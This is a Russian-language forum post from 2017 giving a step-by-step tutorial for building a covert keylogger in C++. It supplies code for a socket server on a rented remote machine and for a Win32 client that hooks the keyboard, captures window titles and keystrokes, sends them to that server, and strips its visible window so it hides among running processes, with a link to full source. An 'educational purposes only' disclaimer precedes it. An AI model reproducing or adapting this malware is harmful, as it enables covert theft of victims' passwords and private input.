Пишем карманный кейлоггер на C++

Тема в разделе "Разное", создана пользователем ims0rry, 9 дек 2017.

  1. ims0rry

    ims0rry

    Сообщения:
    122
    Баллы:
    18

    А прежде чем приступить к прочтению - загляни в мой бложик, там я публикую свои авторские статьи по программированию, вирусологии и прочим интересным вещам

    Скрытый контент.
    https://t.me/ims0rryblog
    Нажмите, чтобы раскрыть...​

    Оригинал статьи -
    Скрытый контент.
    http://telegra.ph/Pishem-kejlogger-na-C-12-07
    Нажмите, чтобы раскрыть...​


    Вся информация предоставлена исключительно в ознакомительных целях. Ни администрация, ни автор не несут ответственности за любой возможный вред, причиненный материалами данной статьи.

    Предисловие
    На протяжении, примерно, месяца я постоянно наблюдал за различными просьбами, вопросами насчет кейлоггеров. Многие искали, но не могли найти исходники, многие искали, но не могли найти продажники и т.д.
    https://i.imgur.com/1b2C5cF.png
    В этой статье я хочу показать, насколько просто написать самому кейлоггер с базовым функционалом. Базу я позаимствовал отсюда - https://simple-keylogger.github.io/, пофиксил баги и доработал под взаимодействие с WinSocket.


    Материалы
    • Visual Studio 2015 Community Update 4
    • Visual C++ 2015
    Структура приложения
    Для начала необходимо определить, как вообще будет работать кейлоггер. Будь то отсылка логов на FTP/Почту, запись нажатий в сокет, отправка файла на гейт, запись логов в бд.
    Я решил остановится на сокетах. Почему? Это удобно, просто и юзабельно.
    Исходя из выбора, нам нужно будет сделать 2 приложения:

    Сервер
    • Консольное приложение, которое будет принимать данные от клиента и выдавать в консоли
    Клиент
    • Собственно, сам кейлоггер, который будет отсылать нажатия клавиш на сервер
    И начнем мы, пожалуй, с сервера.

    Сервер
    Создаем консольное C++ приложение в Visual Studio.
    Весь код есть в оф. примере MSDN - https://msdn.microsoft.com/en-us/library/ms737593(VS.85).aspx
    Нам лишь нужно заменить некоторые значения в нем...
    Сразу пропишем константные переменные: величину буффера и порт сервера, на который будут приходить логи

    Код:
    #define DEFAULT_BUFLEN 1024 //Буффер
    #define DEFAULT_PORT "1337" //Порт
    Вместо единоразового do/while ставим бесконечный цикл, в котором будем принимать данные от клиента, выводить их в консоль, закрывать соединение и по новой:
    Код:
    do {
    ClientSocket = accept(ListenSocket, NULL, NULL); //Принимаем коннект
    iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Считываем лог
    if (iResult > 0) //Если лог не пустой
    printf("%s", recvbuf); //Выводим
    closesocket(ClientSocket);//Закрываем соединение
    memset(recvbuf, 0, sizeof recvbuf);//Освобождаем память
    }
    while (true);
    Компилируем в Release, закидываем на дедик, открываем нужный нам порт и запускаем

    Клиент

    Создаем приложение Win32 в Visual Studio.
    Как я уже и говорил выше, хук клавиатуры и обработчик нажатий я взял с https://github.com/GiacomoLaw/Keylogger/blob/master/windows/klog_main.cpp
    Чтоб прикрутить отправку нажатия на сокет я обратился к https://msdn.microsoft.com/en-us/library/ms737591(VS.85).aspx
    Так же, сразу определяем константные переменные: длину буффера, айпи дедика/компа и порт

    Код:
    #define DEFAULT_BUFLEN 20000
    #define SERVER_IP "127.0.0.1"
    #define SERVER_PORT "1337"
    Некоторые переменные пришлось вытащить из их методов и сделать глобальными, чтобы код начал работать корректно:
    Код:
    WSADATA wsaData;
    SOCKET ConnectSocket = INVALID_SOCKET;
    HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct;
    char lastwindow[256];
    int Save(int key_stroke);// Убрал второй аргумент
    Создаем метод отправки данных на сервер по примеру, который был в начале абзаца. Далее, везде заменяем порт, айпи и передаваемую инфу на аргументы функции:
    Код:
    void sendData(char *ip, char * port, char*data)
    В методе Save делаем следующее - убираем второй аргумент и меняем запись логов в файл на отправку к серверу:
    Код:
    char data[DEFAULT_BUFLEN];
    sprintf(data, "\n\n[Window: %s - at %s]\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, data);
    Далее, по такому же принципу, меняем отправку в нажатиях служебных клавиш. Отправку букв можно сделать таким образом:
    Код:
    char c[512];
    sprintf(c, "%c", key_stroke);
    sendData(SERVER_IP, SERVER_PORT, c);


    Вырезаем все что связано с видимостью окна из кода, и, готово.

    Итог

    При запуске кейлоггера, он повиснет в процессах и будет обрабатывать каждое нажатие на клавиатуре. Возможно, некоторые символы будут отображаться некорректно, например, слеши, но все это можно исправить самому (ведь если бы все было идеально, ко мне в личку стучал Иисус с просьбой проверить продажник приватного кейлоггера).

    Лог будет выглядеть так:

    https://i.imgur.com/HorGkPd.png

    Ссылки

    Сигнатурные сканы (не спрашивайте зачем просканил сервер, просто так):
    Кейлоггер, взятый за основу - https://simple-keylogger.github.io/
    Сокет-сервер - https://msdn.microsoft.com/en-us/library/ms737593(VS.85).aspx
    Сокет-клиент - https://msdn.microsoft.com/en-us/library/ms737591(VS.85).aspx
    Готовые исходники проекта - 5
    ]https://github.com/ims0rry/Socket-keylogger
    [/SIZE]

Поделиться этой страницей

Top